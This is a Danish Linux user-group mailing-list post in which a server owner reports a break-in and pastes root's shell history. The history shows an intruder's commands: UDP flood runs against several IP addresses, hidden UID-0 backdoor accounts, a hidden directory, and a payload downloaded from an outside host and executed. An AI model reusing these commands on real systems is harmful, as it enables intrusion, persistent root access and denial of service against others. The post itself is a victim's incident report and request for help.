← Back to team overview

sslug-teknik team mailing list archive

Re: pakke rod på ubuntu server [HACKET]

 

Michael Rasmussen wrote:

Prøv først dette inden du kører apt-get igen:
sudo dpkg --configure -a

Det hjalp lidt, nu kan jeg logge på som root. Men jeg tror jeg er blevet hacket (de uskyldige kommandoer er mig, de andre aner ikke ikke noget om):

root@ubuntu-fitPC:~# more .bash_history
kill 12542
kill 12543
top
cat>udp.pl
perl udp.pl 89.39.43.6 0 0
perl udp.pl 74.197.10.226 0 0
apt-get update
apt-get upgrade
apt-get upgrade
apt-get  -f
apt-get  -f upgrade
/etc/init.d/mysql stop
apt-get  -f upgrade
/etc/init.d/mysql start
reboot
perl udp.pl 208.180.151.226 0 0
perl udp.pl 98.66.213.89 0 0
/usr/sbin/useradd -o -u 0 dev
/usr/sbin/useradd -o -u 0 tmp
passwd dev
passwd tmp
cd /var/tmp
mkdir ".... /"
cd ".... /"
wget http://angelfire.com/uname/blow.zip
tar zxvf blow.zip
cd blow
chmod +x *
./x 87
perl udp.pl 70.156.218.146 0 0

Ny trækker jeg strømmen på den. Er det noget der vil kunne repereres, eller hedder det frisk install (af debian)? Og vigtigst: kan man sige noget om hvordan det er sket og dermed hvordan jeg kan sikre mig i fremtiden?

--
Atte


Follow ups

References